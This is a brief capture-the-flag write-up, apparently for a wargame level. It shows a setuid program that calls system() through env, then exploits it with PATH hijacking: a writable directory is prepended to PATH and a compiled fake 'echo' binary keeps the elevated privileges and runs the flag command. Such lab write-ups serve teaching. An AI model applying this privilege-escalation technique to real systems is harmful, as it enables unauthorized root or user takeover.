From the site we can get the code for this level:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
int main(int argc, char **argv, char **envp)
{
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/usr/bin/env echo and now what?");
}The program call the bash function echo, but before it evaluate the env. So we could modify the PATH variable and put at the beginnig a location where we can write a new function called echo, but this one instead of doing the normal echo will print the content of the flag01.
To modify the PATH variable,:
export PATH=/home/level01:$PATHThen in "/home/level01", we create our function (echo.c):
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv, char **envp) {
gid_t gid;
uid_t uid;
gid = getegid();
uid = geteuid();
setresgid(gid, gid, gid);
setresuid(uid, uid, uid);
system("/bin/getflag");
}gcc -o /home/level01/echo /home/level01/echo.cThan we can execute the code of this level and when it will call the echo function will call our code instead of the system one, because in the variable PATH it is at the first position.
/home/flag01/flag01